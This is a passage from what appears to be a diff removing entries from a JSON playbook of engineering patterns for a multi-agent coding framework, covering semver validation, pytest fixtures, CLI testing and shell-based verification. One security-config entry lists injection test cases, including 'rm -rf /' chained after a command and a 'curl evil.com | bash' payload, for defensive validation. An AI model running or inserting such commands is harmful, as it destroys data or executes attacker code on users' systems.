2.10.15\")\n print(\"\\nInvalid examples:\")\n print(\" ❌ 01.0.0 (leading zero in major)\")\n print(\" ❌ v1.0.0 (version prefix not allowed)\")\n print(\" ❌ 1.0 (incomplete, missing patch)\")\n print(\" ❌ 1.0.0-alpha (pre-release not supported)\")\n print(\" ❌ 1.0.0.0 (too many components)\")\n print(\"\\nFix: Update version in pyproject.toml to valid semver\")\n sys.exit(1)\n```", - "tags": [ - "error-handling", - "user-experience", - "validation", - "education", - "feedback" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "TESTING_STRATEGIES": { - "description": "Test patterns, mocking approaches, and coverage strategies", - "bullets": [ - { - "id": "test-0001", - "content": "Iterative Refinement Based on Monitor Feedback: Treat Monitor/Evaluator feedback as acceptance criteria for test-driven development in multi-agent workflows. When Monitor identifies gaps (e.g., 'implementation plan missing'), treat this as a failing test. Refine Actor output iteratively until Monitor feedback shows all criteria met. This creates a feedback loop: Actor implements → Monitor evaluates → Actor refines → repeat until quality gates pass. Prevents shipping incomplete work in autonomous systems.", - "code_example": "```python\n# ✅ Monitor-Driven Refinement Loop\ndef execute_with_refinement(task, max_iterations=3):\n for iteration in range(max_iterations):\n # Actor executes\n result = actor.execute(task)\n \n # Monitor evaluates (like pytest)\n feedback = monitor.evaluate(result)\n \n if feedback.all_criteria_met:\n return result # Test passed\n \n # Refine based on feedback (like fixing failing test)\n task.context.append({\n \"iteration\": iteration,\n \"gaps\": feedback.missing_criteria,\n \"instruction\": \"Address these gaps: \" + feedback.gaps\n })\n \n raise QualityGateError(f\"Failed to meet criteria after {max_iterations} iterations\")\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "testing", - "monitor", - "feedback-loop", - "iterative", - "quality-gate", - "multi-agent", - "tdd" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0002", - "content": "Iteration Count as Learning Effectiveness Metric: Track iterations required per subtask to quantitatively validate learning mechanisms and specification quality. Expected pattern: First subtask establishes baseline iteration count, subsequent similar subtasks should require ≤1 iteration if learning is effective. Calculate learning efficiency: (first_subtask_iterations - current_subtask_iterations) / first_subtask_iterations. Example: Subtask 1 = 2 iterations baseline, Subtask 2 = 1 iteration → 50% efficiency gain. If later subtasks don't show improvement, learning mechanism is broken. Additionally, single-iteration completion indicates clear specification quality, while multi-iteration indicates specification ambiguity - use rejection reasons to identify missing details in specs.", - "code_example": "```python\n# ✅ Iteration Tracking for Learning Validation\nclass WorkflowMetrics:\n def __init__(self):\n self.subtask_iterations = {} # {subtask_id: iteration_count}\n \n def track_iteration(self, subtask_id, iteration_num):\n self.subtask_iterations[subtask_id] = iteration_num\n \n def calculate_learning_efficiency(self, baseline_subtask, current_subtask):\n baseline_iters = self.subtask_iterations[baseline_subtask]\n current_iters = self.subtask_iterations[current_subtask]\n \n efficiency = (baseline_iters - current_iters) / baseline_iters\n \n if efficiency < 0:\n raise LearningRegressionError(\n f\"Learning failed: {current_subtask} required MORE iterations \"\n f\"({current_iters}) than baseline ({baseline_iters})\"\n )\n \n return efficiency # 0.5 = 50% improvement\n\n# Usage in orchestrator\nmetrics = WorkflowMetrics()\nfor subtask in workflow.subtasks:\n iterations = execute_with_refinement(subtask)\n metrics.track_iteration(subtask.id, iterations)\n \n if subtask.id > 0: # Not first subtask\n efficiency = metrics.calculate_learning_efficiency(\n baseline_subtask=workflow.subtasks[0].id,\n current_subtask=subtask.id\n )\n logger.info(f\"Learning efficiency: {efficiency:.1%}\")\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0002" - ], - "tags": [ - "testing", - "metrics", - "learning", - "iteration", - "quantitative", - "map-framework", - "python", - "validation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0003", - "content": "Over-Delivery Pattern Recognition: Track optimization over-delivery percentage as quality signal to identify safe vs harmful optimization zones. Calculate: actual_reduction / target_reduction * 100. Establish evidence-based thresholds: (1) 100-150% over target = optimal zone (praised in workflow), (2) 150-200% over = caution zone (review needed), (3) >200% over = danger zone (quality concerns raised). Use over-delivery metric to calibrate optimization aggressiveness: praised optimizations establish safe upper bound, concerning optimizations establish danger threshold. Pattern enables quantitative optimization validation: 'Monitor 135% praised' + 'Evaluator 238% concerns' → safe threshold between 135-238%, likely ~150-180% depending on template purpose (validation vs teaching).", - "code_example": "```python\n# ✅ Over-Delivery Tracking and Threshold Validation\nclass OptimizationMetrics:\n # Evidence-based thresholds from workflow analysis\n THRESHOLDS = {\n \"optimal_zone\": (1.0, 1.5), # 100-150% over target\n \"caution_zone\": (1.5, 2.0), # 150-200% over target \n \"danger_zone\": (2.0, float('inf')) # >200% over target\n }\n \n @staticmethod\n def calculate_over_delivery(target: float, actual: float) -> float:\n \"\"\"Returns over-delivery ratio (e.g., 1.35 = 135% of target)\"\"\"\n return actual / target\n \n @staticmethod\n def assess_quality(over_delivery: float, template_purpose: str) -> dict:\n \"\"\"Assess optimization quality based on over-delivery\"\"\"\n if over_delivery < 1.0:\n return {\"zone\": \"under_target\", \"action\": \"increase_optimization\"}\n elif over_delivery <= 1.5:\n return {\"zone\": \"optimal\", \"action\": \"approved\", \n \"evidence\": \"Monitor 135% praised\"}\n elif over_delivery <= 2.0:\n return {\"zone\": \"caution\", \"action\": \"review_required\",\n \"risk\": \"approaching_danger_threshold\"}\n else:\n return {\"zone\": \"danger\", \"action\": \"reject\",\n \"evidence\": \"Evaluator 238% raised concerns\"}\n\n# Usage in optimization workflow:\ntarget_reduction = 0.50 # 50% target\nactual_reduction = 0.67 # 67% achieved\nover_delivery = OptimizationMetrics.calculate_over_delivery(\n target_reduction, actual_reduction\n) # Returns 1.34 (134%)\n\nassessment = OptimizationMetrics.assess_quality(over_delivery, \"validation\")\nprint(f\"Zone: {assessment['zone']}, Action: {assessment['action']}\")\n# Output: Zone: optimal, Action: approved\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "test-0002", - "impl-0004" - ], - "tags": [ - "testing", - "optimization", - "metrics", - "over-delivery", - "quality-signal", - "thresholds", - "quantitative", - "map-framework", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0004", - "content": "Template Directory Cleanup Verification Pattern: When maintaining template directories that should contain only canonical content, proactively scan for and remove artifact files created by editors, backup tools, or interrupted operations. Common patterns to clean: .backup, .old, .tmp, .swp, ~ (tilde backups). Perform cleanup as a separate step from content synchronization (separation of concerns). Verify artifacts are truly disposable before removal - check they match disposable patterns and aren't user-created content files. Clean directories before hash-based verification to prevent polluted checksums requiring re-verification. Always verify cleanup succeeded using pattern matching.", - "code_example": "```bash\n# ❌ INCORRECT - delete without verification\nrm -f src/templates/**/*.backup\n\n# ✅ CORRECT - verify artifacts before removal\nfind src/templates -type f \\( \\\n -name '*.backup' -o \\\n -name '*.old' -o \\\n -name '*.tmp' -o \\\n -name '*.swp' -o \\\n -name '*~' \\) -delete\n\n# Verify cleanup succeeded\nfind src/templates -type f | grep -E '\\.(backup|old|tmp|swp)|~$' || echo \"Clean\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T10:00:56.751830Z", - "last_used_at": "2025-10-20T10:00:56.751831Z", - "related_bullets": [ - "test-0001" - ], - "tags": [ - "cleanup", - "verification", - "template", - "artifacts", - "testing", - "devops", - "bash", - "find", - "pattern-matching" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0005", - "content": "Exploratory Testing Documentation Pattern: For behavioral investigation tasks, deliver both executable tests AND structured markdown documentation to serve dual audiences (technical + business). Executable tests (pytest) provide automated regression prevention and technical proof. Markdown documentation (behavior matrices) provides business stakeholder visibility and decision-making context. Organize tests by system state (e.g., 'incomplete plan', 'no plan', 'multiple plans') not by API commands - this mirrors user mental models and business scenarios. State-based organization scales better than command-based (N states vs M*N command-state combinations). Pattern proven in exploratory API testing workflows.", - "code_example": "```python\n# ❌ POOR - organized by API commands (doesn't scale)\ndef test_get_plan():\n pass\n\ndef test_create_plan():\n pass\n\ndef test_delete_plan():\n pass\n\n# ✅ GOOD - organized by system states\ndef test_behavior_with_no_plan_exists():\n \"\"\"When user has no plan, GET returns empty, CREATE succeeds\"\"\"\n api.delete_all_plans(user_id)\n assert api.get_plan(user_id) == None\n assert api.create_plan(user_id, data).success == True\n\ndef test_behavior_with_incomplete_plan_exists():\n \"\"\"When incomplete plan exists, GET returns it, CREATE replaces\"\"\"\n api.create_plan(user_id, {\"partial\": True})\n existing = api.get_plan(user_id)\n assert existing.complete == False\n new_plan = api.create_plan(user_id, {\"complete\": True})\n assert api.get_plan(user_id).id == new_plan.id # Replaced\n\ndef test_behavior_with_complete_plan_exists():\n \"\"\"When complete plan exists, GET returns it, CREATE fails with conflict\"\"\"\n api.create_plan(user_id, {\"complete\": True})\n with pytest.raises(ConflictError):\n api.create_plan(user_id, {\"other\": True})\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0001" - ], - "tags": [ - "testing", - "exploratory", - "pytest", - "documentation", - "behavior", - "state-based", - "python", - "regression" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0006", - "content": "Pytest Fixture Composition Pattern: Build complex test scenarios from simple reusable fixtures using composition not monolithic fixtures. Create atomic fixtures for basic states (user, empty_plan, incomplete_plan, complete_plan), then compose them in test functions. This enables combinatorial testing (N fixtures → 2^N scenarios) without fixture explosion. Use pytest's dependency injection to automatically set up state chains. Pattern reduces fixture maintenance burden: change atomic fixture once, all compositions inherit the fix. Prefer function-scoped fixtures for test isolation unless explicit state sharing needed.", - "code_example": "```python\n# ❌ POOR - monolithic fixtures (doesn't compose)\n@pytest.fixture\ndef user_with_incomplete_plan():\n user = create_user()\n plan = create_plan(user.id, complete=False)\n return user, plan\n\n@pytest.fixture\ndef user_with_complete_plan():\n user = create_user()\n plan = create_plan(user.id, complete=True)\n return user, plan\n\n# ✅ GOOD - composable atomic fixtures\n@pytest.fixture\ndef user():\n \"\"\"Atomic fixture: user with no plans\"\"\"\n u = create_user()\n yield u\n cleanup_user(u.id)\n\n@pytest.fixture\ndef incomplete_plan(user):\n \"\"\"Atomic fixture: incomplete plan (depends on user)\"\"\"\n plan = create_plan(user.id, complete=False)\n yield plan\n cleanup_plan(plan.id)\n\n@pytest.fixture\ndef complete_plan(user):\n \"\"\"Atomic fixture: complete plan (depends on user)\"\"\"\n plan = create_plan(user.id, complete=True)\n yield plan\n cleanup_plan(plan.id)\n\n# Tests compose fixtures as needed\ndef test_scenario_with_incomplete_plan(user, incomplete_plan):\n \"\"\"Pytest injects user + incomplete_plan automatically\"\"\"\n assert get_plan(user.id).id == incomplete_plan.id\n\ndef test_scenario_with_complete_plan(user, complete_plan):\n \"\"\"Different composition, same atomic fixtures\"\"\"\n assert get_plan(user.id).complete == True\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001" - ], - "tags": [ - "pytest", - "fixtures", - "composition", - "testing", - "python", - "reusable", - "atomic", - "dependency-injection" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0007", - "content": "Bug Documentation as Tests: When discovering bugs during exploratory testing, document them as tests using pytest.raises or pytest.mark.xfail to keep bugs visible and reproducible until fixed. This creates executable bug tracker: failing test documents expected behavior, pytest.raises documents known broken behavior. Once bug is fixed, convert pytest.raises to assertion. Pattern prevents bug amnesia (verbal reports forgotten) and provides regression test automatically. Use descriptive test names as bug titles. Include bug ID in test docstring if using issue tracker. Prefer pytest.raises over pytest.mark.xfail when failure mode is known (specific exception type).", - "code_example": "```python\n# ❌ POOR - bug reported verbally/Slack, forgotten\n# \"Hey, DELETE fails when plan has nested objects\"\n\n# ✅ GOOD - bug documented as test\ndef test_delete_plan_with_nested_objects_raises_500():\n \"\"\"\n BUG: DELETE /plans/{id} returns 500 when plan has nested objects.\n Expected: 204 No Content (cascade delete)\n Actual: 500 Internal Server Error\n Issue: #1234\n \"\"\"\n plan = create_plan(user_id, {\"nested\": {\"data\": True}})\n \n # Document known broken behavior\n with pytest.raises(InternalServerError):\n api.delete_plan(plan.id)\n \n # After bug fix, replace with:\n # response = api.delete_plan(plan.id)\n # assert response.status_code == 204\n\n# Alternative: use xfail for less specific failure\n@pytest.mark.xfail(reason=\"Bug #1234: DELETE fails with nested objects\")\ndef test_delete_plan_with_nested_objects():\n plan = create_plan(user_id, {\"nested\": {\"data\": True}})\n response = api.delete_plan(plan.id)\n assert response.status_code == 204\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001", - "test-0004" - ], - "tags": [ - "pytest", - "bug-tracking", - "testing", - "documentation", - "pytest.raises", - "xfail", - "regression", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0008", - "content": "Comprehensive Edge Case Testing with State-Based Organization: When fixing bugs or adding defensive features, write comprehensive test suites covering ALL edge cases organized by system state, not by operations. Structure: Group tests by preconditions (e.g., 'no plan exists', 'incomplete plan', 'complete plan', 'multiple plans'), then test all operations within each state. This ensures complete coverage matrix: N states × M operations = comprehensive test suite. Pattern proven: 28 tests organized by state caught 2 bugs (update crash, silent overwrite) and validated all fixes. State-based organization mirrors user mental models better than operation-based grouping. Include tests for: (1) Expected behavior, (2) Known bugs (with pytest.raises), (3) Force/safety flags, (4) Error messages content.", - "code_example": "```python\n# ❌ POOR - operation-based organization (incomplete coverage)\nclass TestCreatePlan:\n def test_create_plan(self): # Only happy path\n plan = manager.create_plan('feat1', 'goal', subtasks)\n assert plan.task_id == 'feat1'\n\nclass TestUpdatePlan:\n def test_update_plan(self): # Missing edge cases\n manager.update_subtask_status(1, 'completed')\n\n# ✅ GOOD - state-based organization (comprehensive)\nclass TestBehaviorWithNoPlanExists:\n \"\"\"Test all operations when no plan exists (precondition: empty state)\"\"\"\n \n def test_get_context_returns_no_plan_message(self, manager):\n result = manager.get_context()\n assert \"No active plan\" in result\n \n def test_update_raises_clear_error(self, manager):\n with pytest.raises(ValueError, match=\"No active plan exists. Create a plan first\"):\n manager.update_subtask_status(1, 'completed')\n \n def test_create_succeeds(self, manager, sample_subtasks):\n plan = manager.create_plan('feat1', 'goal', sample_subtasks)\n assert plan.task_id == 'feat1'\n\nclass TestBehaviorWithIncompletePlanExists:\n \"\"\"Test all operations when incomplete plan exists\"\"\"\n \n def test_get_context_shows_progress(self, manager_with_plan):\n result = manager_with_plan.get_context()\n assert \"0/2 subtasks completed\" in result\n \n def test_update_works_correctly(self, manager_with_plan):\n manager_with_plan.update_subtask_status(1, 'completed')\n plan = manager_with_plan._load_plan()\n assert plan.subtasks[0].status == 'completed'\n \n def test_create_without_force_raises_error(self, manager_with_plan, sample_subtasks):\n with pytest.raises(ValueError, match=\"A plan already exists.*--force\"):\n manager_with_plan.create_plan('feat2', 'new', sample_subtasks)\n \n def test_create_with_force_overwrites(self, manager_with_plan, sample_subtasks):\n new_plan = manager_with_plan.create_plan('feat2', 'new', sample_subtasks, force=True)\n assert new_plan.task_id == 'feat2'\n\nclass TestForceFlagBehavior:\n \"\"\"Test force flag specifically (safety mechanism)\"\"\"\n \n def test_force_prevents_accidental_overwrite(self, manager_with_plan):\n # Validates the intentional breaking change\n with pytest.raises(ValueError):\n manager_with_plan.create_plan('new', 'goal', [])\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "test-0005", - "test-0006", - "impl-0008" - ], - "tags": [ - "testing", - "pytest", - "edge-cases", - "state-based", - "comprehensive", - "defensive", - "python", - "coverage" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0009", - "content": "Command-Based Arithmetic Verification: NEVER trust mental arithmetic for numeric claims in documentation or analysis. ALWAYS verify counts, percentages, and calculations with shell commands (grep -c, wc -l, bc) BEFORE recording claims. Include verification commands inline for reproducibility and audit trails. Pattern prevents embarrassing arithmetic errors in deliverables (claiming 56 facts when actual is 55, claiming 90.3% when actual is 88.7%). Commands provide proof and enable automated validation. Mental arithmetic error rate: ~15% for multi-step calculations. Shell verification error rate: ~0% (deterministic).", - "code_example": "```bash\n# ❌ INCORRECT - mental arithmetic (error-prone)\necho \"File has 56 facts (90.3% of 62 total)\" >> report.txt\n# Risk: Arithmetic errors slip into deliverables\n\n# ✅ CORRECT - verify with shell commands\n# Count facts\nfact_count=$(grep -c '\\*\\*Fact:' verified_facts_workflow.txt)\necho \"Facts: $fact_count\" # Output: 55 (NOT 56!)\n\n# Count total lines for context\ntotal_lines=$(wc -l < verified_facts_workflow.txt)\necho \"Total lines: $total_lines\" # Output: 588\n\n# Calculate percentage with bc (floating point)\npercentage=$(echo \"scale=1; $fact_count / 62 * 100\" | bc)\necho \"Percentage: $percentage%\" # Output: 88.7% (NOT 90.3%!)\n\n# Record VERIFIED claims with proof\ncat >> report.txt << EOF\n**Verified Metrics:**\n- Facts: $fact_count (verified: grep -c '\\*\\*Fact:' verified_facts_workflow.txt)\n- Total lines: $total_lines (verified: wc -l)\n- Percentage: $percentage% (verified: echo \"scale=1; $fact_count/62*100\" | bc)\nEOF\n\n# Audit trail: anyone can re-run commands to verify\n```", - "tags": [ - "arithmetic", - "verification", - "bash", - "grep", - "bc", - "wc", - "accuracy", - "documentation", - "audit", - "testing" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014424Z", - "related_bullets": [ - "impl-0009", - "test-0004" - ], - "last_used_at": "2025-10-21T09:01:00.000000Z" - }, - { - "id": "test-0010", - "content": "SCOPE-Aware Validation Pattern: When validating outputs from tasks with explicit source constraints (e.g., 'Use ONLY verified_facts.txt'), validation MUST check compliance against the designated source file, NOT against implementation code or external references. Validation target = constraint target. For SCOPE constraints, validate boundary compliance FIRST (is content from allowed source?), factual accuracy SECOND (is content correct per that source?). Pattern: Task says 'Use ONLY file X' → Validator reads file X → Checks output matches file X, regardless of whether file X matches code/reality. This separates constraint compliance from content accuracy.", - "code_example": "```python\n# Task: Create presentation using ONLY verified_facts.txt\n# Slide claims: \"System has 5 MCP tools\" (from verified_facts.txt line 42)\n\n# ❌ INCORRECT - Validate against code\ndef validate_slide(slide_content):\n # Check actual codebase\n actual_tools = count_mcp_tools_in_code() # Returns 3\n if \"5 MCP tools\" in slide_content and actual_tools != 5:\n return ValidationError(\"Slide claims 5 tools but code has 3\")\n# Problem: Validates factual accuracy, ignores SCOPE constraint\n\n# ✅ CORRECT - Validate against designated source\ndef validate_slide_scope_aware(slide_content, designated_source):\n # Step 1: SCOPE validation (boundary compliance)\n source_content = read_file(designated_source) # verified_facts.txt\n source_claims = extract_claims(source_content) # \"5 MCP tools\" at line 42\n \n for claim in extract_claims(slide_content):\n if claim not in source_claims:\n return ValidationError(\n f\"Claim '{claim}' not found in designated source {designated_source}. \"\n f\"SCOPE constraint violated.\"\n )\n \n # Step 2: Factual validation (optional, separate concern)\n # Only validate if task requires code accuracy, not just source compliance\n if task.requires_code_accuracy:\n actual_tools = count_mcp_tools_in_code()\n # Report discrepancy but don't fail SCOPE validation\n if actual_tools != 5:\n warnings.append(f\"Source file claims 5 tools but code has {actual_tools}\")\n \n return ValidationSuccess()\n\n# Key: SCOPE constraint compliance (does slide match source?) is PRIMARY\n# Factual accuracy (does source match code?) is SECONDARY\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T11:18:48.871189Z", - "last_used_at": "2025-10-21T14:46:01.752282Z", - "related_bullets": [ - "impl-0013", - "impl-0014" - ], - "tags": [ - "validation", - "scope-constraint", - "boundary-compliance", - "monitor", - "testing", - "source-verification", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0015", - "content": "3-Layer Testing for CLI Tools (Typer/Click): CLI tools distributed via pip require testing at 3 distinct layers to catch integration gaps. Layer 1: Unit tests for core logic (business logic, algorithms, validation rules) - traditional pytest, 54+ tests proven effective. Layer 2: CLI integration tests using CliRunner (Typer's test harness) - verify command parsing, flag handling, exit codes, stdout/stderr output. Layer 3: E2E tests with installed package (subprocess.run after pip install) - verify CLI accessible to users, test matrix across install methods (editable install, uv tool install, standard pip install). Missing Layer 2/3 creates risk: core logic works (Layer 1 passes) but CLI flags parse incorrectly, exit codes wrong, or command not accessible post-install. Pattern proven: validate-dependencies.py had 54 unit tests (Layer 1) but missing Layer 2 CliRunner tests exposed integration gaps during manual testing.", - "code_example": "```python\n# Layer 1: Unit Tests (Core Logic)\nimport pytest\nfrom mapify_cli.tools.validate_dependencies import DependencyValidator\n\ndef test_validator_detects_missing_dependencies():\n \"\"\"Test core validation logic without CLI\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports('sample.py')\n assert 'pytest' in result.missing_deps\n\n# Layer 2: CLI Integration Tests (CliRunner)\nfrom typer.testing import CliRunner\nfrom mapify_cli.main import app # Typer app\n\nrunner = CliRunner()\n\ndef test_cli_validate_deps_command():\n \"\"\"Test CLI command parsing and output via CliRunner\"\"\"\n result = runner.invoke(app, ['validate-deps', '--help'])\n assert result.exit_code == 0\n assert 'Validate dependencies' in result.stdout\n\ndef test_cli_validate_deps_with_missing():\n \"\"\"Test CLI exit codes and error reporting\"\"\"\n result = runner.invoke(app, ['validate-deps', 'tests/fixtures/missing_deps.py'])\n assert result.exit_code == 1 # Error exit code\n assert 'Missing dependencies' in result.stdout\n\n# Layer 3: E2E Tests (Installed Package)\nimport subprocess\nimport sys\n\ndef test_cli_accessible_after_install():\n \"\"\"Test CLI accessible to pip install users\"\"\"\n # Assumes package installed in current environment\n result = subprocess.run(\n [sys.executable, '-m', 'mapify_cli', 'validate-deps', '--help'],\n capture_output=True,\n text=True\n )\n assert result.returncode == 0\n assert 'Validate dependencies' in result.stdout\n\n@pytest.mark.parametrize('install_method', [\n 'pip install -e .', # Editable\n 'uv tool install .', # UV tool\n 'pip install mapify-cli' # Standard\n])\ndef test_cli_works_across_install_methods(install_method, tmp_venv):\n \"\"\"Test matrix: verify CLI accessible via all install methods\"\"\"\n subprocess.run(install_method, shell=True, cwd=tmp_venv, check=True)\n result = subprocess.run(\n f'{tmp_venv}/bin/mapify validate-deps --version',\n shell=True,\n capture_output=True\n )\n assert result.returncode == 0\n```", - "helpful_count": 7, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892107Z", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0016", - "content": "Automation Format Validation with Target Tool Patterns: Before committing structured files consumed by automation scripts (CHANGELOG.md, package.json, pyproject.toml), validate format using SAME extraction patterns that automation uses. Pattern: CHANGELOG.md consumed by bump-version.sh using 'sed -n /## \\\\[1.0.0\\\\]/,/## \\\\[/p' → Before committing, test extraction with identical sed/grep commands → Verify output matches expectations. This prevents silent automation failures where file parses correctly for humans but breaks automation regex. Predictor role ideal for this validation - simulates automation environment before deployment.", - "code_example": "```bash\n# CHANGELOG.md automation validation example\n# bump-version.sh uses this pattern to extract release notes:\n# sed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1\n\n# ✅ VALIDATION TEST - run BEFORE committing CHANGELOG.md\nVERSION=\"1.0.0\"\n\n# Test extraction pattern (same command automation uses)\nRELEASE_NOTES=$(sed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1)\n\necho \"Extracted release notes:\"\necho \"$RELEASE_NOTES\"\n\n# Validate extraction succeeded\nif [ -z \"$RELEASE_NOTES\" ]; then\n echo \"❌ VALIDATION FAILED: sed extraction returned empty (automation will fail)\"\n echo \"Check CHANGELOG.md format: ## [$VERSION] header must exist\"\n exit 1\nfi\n\n# Validate format expectations\nif ! echo \"$RELEASE_NOTES\" | grep -q \"## \\\\[$VERSION\\\\]\"; then\n echo \"❌ VALIDATION FAILED: version header missing in extraction\"\n exit 1\nfi\n\necho \"✅ VALIDATION PASSED: CHANGELOG.md format compatible with bump-version.sh automation\"\n```", - "tags": [ - "automation", - "validation", - "changelog", - "sed", - "grep", - "predictor", - "map-framework", - "ci-cd" - ], - "related_bullets": [ - "impl-0027", - "test-0002" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T21:15:57.637760+00:00", - "last_used_at": "2025-10-25T21:15:57.637760+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0026", - "content": "Investigation Scope Checklist for CLI Command Issues: When debugging CLI command failures, use comprehensive first-iteration search checklist to avoid incomplete investigations requiring multiple rounds. Checklist: (1) **Definition Location** - grep for @app.command('command-name') decorator to find implementation, (2) **Function Signature** - inspect parameters, types, defaults (typer.Argument vs typer.Option), (3) **Registration Points** - search for app.add_typer() calls in main CLI, check sub-app integration, (4) **Documentation References** - grep command name in docs/ (USAGE.md, README.md, ARCHITECTURE.md), (5) **Test Coverage** - search test files for command name usage examples, (6) **CLI Entry Points** - check pyproject.toml [project.scripts] for command registration. Pattern proven: systematic multi-location search in first iteration prevents 'found definition but missed docs' or 'found docs but missed tests' gaps. Document search locations in investigation notes for reviewability.", - "code_example": "```bash\n# ✅ COMPREHENSIVE FIRST-ITERATION SEARCH\n# Investigation: Why does 'mapify validate-dependencies --file=X' fail?\n\n# Step 1: Find command definition\ngrep -r \"@app.command('validate-dependencies')\" src/\n# → src/mapify_cli/tools/validate_app.py:15\n\n# Step 2: Check function signature\ngrep -A 10 \"def validate_deps\" src/mapify_cli/tools/validate_app.py\n# → Reveals: file_path: Path = typer.Argument(...)\n# → FINDING: Expects positional Argument, not --file Option!\n\n# Step 3: Find registration in main CLI\ngrep -r \"validate_app\" src/mapify_cli/\n# → src/mapify_cli/main.py: app.add_typer(validate_app.app, name='validate')\n\n# Step 4: Check documentation examples\ngrep -r \"validate-dependencies\" docs/\n# → docs/USAGE.md:45: mapify validate-dependencies --file=path\n# → FINDING: Docs show --file flag (incorrect!)\n\n# Step 5: Check test coverage\ngrep -r \"validate-dependencies\" tests/\n# → tests/test_validate_app.py:23: Uses correct positional syntax\n\n# Step 6: Verify CLI entry point\ngrep \"validate\" pyproject.toml\n# → [project.scripts] mapify = \"mapify_cli.main:app\"\n\n# Result: Complete picture in ONE iteration:\n# - Implementation uses Argument (positional)\n# - Docs incorrectly show Option (--file flag)\n# - Tests use correct syntax\n# - Root cause: documentation drift\n\n# ❌ INCOMPLETE SEARCH (multiple iterations)\n# Iteration 1: Found definition, missed docs\n# Iteration 2: Found docs drift, missed tests\n# Iteration 3: Checked tests...\n# Result: 3 rounds to build complete picture\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847685Z", - "last_used_at": "2025-10-27T17:45:10.847686Z", - "related_bullets": [ - "test-0025" - ], - "tags": [ - "debugging", - "investigation", - "cli", - "systematic-search", - "checklist" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0001", - "content": "Monitor Validation for Security Configs: High-risk configurations (auto-approval rules, permissions, access control) require Monitor agent validation to systematically expose attack vectors. Monitor should check: (1) wildcard scope (does *.ext match unintended files?), (2) binary prefix matches (does cmd* match malicious binaries?), (3) command chaining (does pattern* allow arbitrary suffixes?), (4) argument injection (can user-controlled input bypass intent?). Set high_risk: true for security configs to enforce stricter validation.", - "code_example": "```yaml\n# Monitor validation checklist for security configs\nvalidation_checks:\n wildcard_scope:\n pattern: \"*.json*\"\n test_cases:\n - \"graph.json\" # ✅ Intended match\n - \"graph.json.bak\" # ❌ Unintended match (backup file)\n - \"malicious.json.sh\" # ❌ Unintended match (executable)\n \n binary_prefix:\n pattern: \"jq*\"\n test_cases:\n - \"jq\" # ✅ Intended binary\n - \"jq-exploit\" # ❌ Malicious binary with 'jq' prefix\n - \"jqx\" # ❌ Different tool with 'jq' prefix\n \n command_chaining:\n pattern: \"[ -f file ]*\"\n test_cases:\n - \"[ -f file ]\" # ✅ Intended command\n - \"[ -f file ] && rm -rf /\" # ❌ Chained malicious command\n \n argument_injection:\n pattern: \"git commit -m *\"\n test_cases:\n - \"git commit -m 'fix'\" # ✅ Intended\n - \"git commit -m 'fix' && curl evil.com | bash\" # ❌ Injection\n\n# Mark security-critical configs for strict validation\nconfig_metadata:\n high_risk: true # Triggers additional Monitor checks\n requires_exact_match: true\n allow_wildcards: false\n```", - "tags": [ - "testing", - "security", - "monitor-validation", - "attack-vectors", - "config-validation", - "high-risk" - ], - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477689+00:00", - "last_used_at": "2025-10-27T19:38:54.477690+00:00", - "related_bullets": [ - "sec-0003", - "sec-0004", - "debug-0001" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "CODE_QUALITY_RULES": { - "description": "Style guides, naming conventions, and maintainability principles", - "bullets": [ - { - "id": "qual-0001", - "content": "Analysis Document Completeness: Every analysis document must answer 4 critical questions: (1) WHAT 